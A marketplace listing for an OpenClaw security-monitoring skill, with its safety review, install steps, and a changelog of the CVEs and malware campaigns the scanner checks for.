← Back to Skills Marketplace
OpenClaw Security Monitor
by
Adrian Birzu
· GitHub ↗
· v5.3.2
· MIT-0
3169
Downloads
6
Stars
25
Active Installs
18
Versions
Install in OpenClaw
/install openclaw-security-monitor
Description
Proactive security monitoring, threat scanning, and auto-remediation for OpenClaw deployments
Usage Guidance
This project appears to be what it claims: a local security scanner and remediation toolkit. Before installing or running anything: 1) Review remediation scripts (scripts/remediate/*.sh) to understand what changes they perform; run remediate.sh only in --dry-run first. 2) Do not enable unattended remediation (OPENCLAW_ALLOW_UNATTENDED_REMEDIATE) on production systems without manual review. 3) Be aware scans read sensitive files (openclaw.json, SKILL.md, logs, potential ~/.ssh/.env); treat outputs as sensitive. 4) Inspect/update-ioc.sh and telegram-setup.sh to confirm which remote endpoints are contacted before allowing network access. 5) Verify the repository origin (https://github.com/adibirzu/openclaw-security-monitor) and consider running first in an isolated/non-production instance. If you want me to, I can scan specific scripts (e.g., remediate.sh, update-ioc.sh) for exact commands that modify files or contact remote hosts.
Capability Analysis
Type: OpenClaw Skill
Name: openclaw-security-monitor
Version: 5.3.2
The bundle is a legitimate security monitoring and hardening utility for OpenClaw deployments. It provides a comprehensive suite of scripts (scan.sh, remediate.sh, update-ioc.sh) designed to detect and mitigate known threats such as the ClawHavoc malware campaign, credential stealers, and over 60 disclosed CVEs. The scanner logic uses grep-based pattern matching against local files and configurations, while the remediation scripts offer transparent fixes like securing file permissions (chmod 600) and blocking malicious domains via /etc/hosts. The tool follows security best practices by requiring explicit user opt-in for automated fixes (OPENCLAW_ALLOW_UNATTENDED_REMEDIATE) and providing a read-only web dashboard (server.js) for visibility without execution risk.
Capability Tags
Capability Assessment
Purpose & Capability
Name/description (security monitoring, scanning, remediation) match the included assets: 41-point scanner, IOC lists, read-only dashboard, and remediation scripts. Requested binaries (bash, curl, node, lsof) and the brew node install are appropriate for a Node dashboard plus shell tooling.
Instruction Scope
Runtime instructions invoke local scripts under ~/.openclaw/workspace/skills/<skill-dir>/scripts/*.sh. The dashboard and scanner intentionally read OpenClaw state (logs, openclaw.json, other SKILL.md files, skills directory). This is expected for a security auditor but means the tool will read sensitive local files (gateway tokens, device files, memory/SOUL files) when run — review and consent before executing.
Install Mechanism
Installer clones the GitHub repo and makes scripts executable; the registry install entry only suggests installing node via brew. No opaque binary downloads or extract-from-arbitrary-URL installs were present in the manifest. Note: update-ioc and telegram setup scripts may fetch external IOC/alerting feeds (normal for this tool) — inspect their endpoints if you need to restrict network calls.
Credentials
The skill declares no required environment variables, which aligns with the manifest. However the scanner and remediation logic access sensitive local configuration and artifacts (.openclaw logs, openclaw.json, skill SKILL.md, ~/.ssh, ENV files referenced in checks). Access is proportionate to the security purpose but should be treated as high-sensitivity read access. Telegram/alerting features require tokens or webhooks (optional) that are not predeclared.
Persistence & Privilege
always:false and disable-model-invocation:true reduce autonomous blast radius. Persistence (cron) is strictly optional and requires explicit user action. The skill does include automated remediation scripts that can make system changes when you run them; unattended remediation requires an explicit env opt-in (OPENCLAW_ALLOW_UNATTENDED_REMEDIATE=1).
How to Use
- Make sure OpenClaw is installed (local or Docker)
- Run the install command in chat:
/install openclaw-security-monitor - After installation, invoke the skill by name or use
/openclaw-security-monitor - Provide required inputs per the skill's parameter spec and get structured output
Version History
v5.3.2
Patch v5.3.2 fixes PATH hijack false positives for normal Homebrew-managed binaries while keeping OpenClaw v2026.4.24 baseline and April 2026 advisory coverage.
v5.3.1
Update OpenClaw Security Monitor to v5.3.1: current recommended baseline v2026.4.24; refresh GitHub/skill metadata and keep April 2026 advisory coverage for setup-api.js cwd execution, webhook SecretRef replay, gateway config mutation guard bypass, dotenv connector/runtime overrides, MCP owner-context/tool-policy issues, OpenShell FS bridge escapes, and expanded ClawHub artifact scanning.
v5.3.0
Update OpenClaw Security Monitor to v5.3.0: current safe baseline v2026.4.23; adds April 21-24 advisory coverage for setup-api.js cwd execution, webhook SecretRef replay, gateway config mutation guard bypass, dotenv connector/runtime overrides, MCP owner-context/tool-policy issues, OpenShell FS bridge escapes, and expanded ClawHub skill artifact scanning.
v5.2.1
Finalize bundle-plugin support and keep corrected ClawHub metadata.
v5.2.0
Add bundle-plugin manifest, keep ClawHub metadata fixes, and preserve April 2026 threat coverage.
v5.1.1
Move requirements into metadata.openclaw, add registry-visible install metadata, and prepare for bundle-plugin publishing.
v5.1.0
Add April 2026 advisory coverage, raise safe baseline to v2026.4.15, and refresh IOC/update logic.
v4.2.1
v4.2.1: Safety posture hardening — removed curl|bash installer, IOC updates require interactive confirmation, no auto-installed persistence/symlinks/cron. Complete remediation guides for all 59 checks. Expanded Security & Transparency documentation.
v4.2.0
v4.2.0: Complete remediation guides for all 59 checks. Dashboard with IOC stats, skills list, check filters, remediation log. 8 new security checks (CVE-2026-28469, CVE-2026-28472, CVE-2026-32302, GHSA-7h7g, GHSA-vmhq, MCP tool poisoning, SANDWORM_MODE worm detection, rules file Unicode injection). 35+ CVEs, 40+ GHSAs, 1,200+ malicious packages.
v4.1.1
Fix ClawHub URL in issue, add IOC/skills/config panels to dashboard, expand README with CVE mapping table and threat intelligence sources.
v4.1.0
Remove child_process from dashboard to resolve ClawHub security flag. Dashboard is now read-only (no shell execution). Scans and remediation are CLI-only. Added install.sh for one-command setup. Updated README with all 59 checks.
v4.0.0
v4.0.0: 59-point scanner with 8 new checks (CVE-2026-28469, CVE-2026-28472, CVE-2026-32302, GHSA-7h7g, GHSA-vmhq, MCP tool poisoning, SANDWORM_MODE worm detection, rules file Unicode injection). 35+ CVEs, 40+ GHSAs, 1,200+ malicious packages.
v3.4.0
Add checks 37-40: PATH hijacking (GHSA-jqpq), env override injection (GHSA-82g8), macOS deep link truncation (CVE-2026-26320), log poisoning/WebSocket header injection. 40-point scanner with 8 new remediation scripts and 22 hardening recommendations.
v3.2.0
openclaw-security-monitor 3.2.0 changelog:
- Updated SKILL.md version to 3.2.0.
- No changes to functionality, commands, or usage documented.
- All previous features, instructions, and documentation remain unchanged.
v3.1.0
Major threat intel update: 9 new CVEs, expanded ClawHavoc (824+ skills), Vidar infostealer campaign, improved WebSocket check, 12 new threat sources. Minimum safe OpenClaw version now v2026.2.14.
v3.0.1
Clean re-publish: 32-point security scanner with per-check auto-remediation, web dashboard, IOC database, Telegram alerts
v3.0.0
Add 32 per-check remediation scripts with auto-fix and guidance modes, dashboard remediation UI with per-check and Remediate All buttons, fix dynamic check numbering,
expand .gitignore
v0.1.0
Initial release of openclaw-security-monitor: comprehensive security for OpenClaw deployments.
- Provides 32-point security scan, auto-remediation, and actionable exit codes.
- Real-time monitoring, daily automated scans, and centralized dashboard with process visualizations.
- Telegram alerting and detailed network IOC (Indicators of Compromise) checks included.
- Extensive remediation options: auto-fix, dry-run, per-check, or full coverage.
- Integrates threat intelligence from over 40 leading security sources and real-world attack research.
- Easy installation and seamless agent command integration via SKILL.md.
Metadata
Frequently Asked Questions
What is OpenClaw Security Monitor?
Proactive security monitoring, threat scanning, and auto-remediation for OpenClaw deployments. It is an AI Agent Skill for Claude Code / OpenClaw, with 3169 downloads so far.
How do I install OpenClaw Security Monitor?
Run "/install openclaw-security-monitor" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.
Is OpenClaw Security Monitor free?
Yes, OpenClaw Security Monitor is completely free, licensed under MIT-0. You can download, install and use it at no cost.
Which platforms does OpenClaw Security Monitor support?
OpenClaw Security Monitor is cross-platform and runs anywhere OpenClaw / Claude Code is available (darwin, linux).
Who created OpenClaw Security Monitor?
It is built and maintained by Adrian Birzu (@adibirzu); the current version is v5.3.2.
More Skills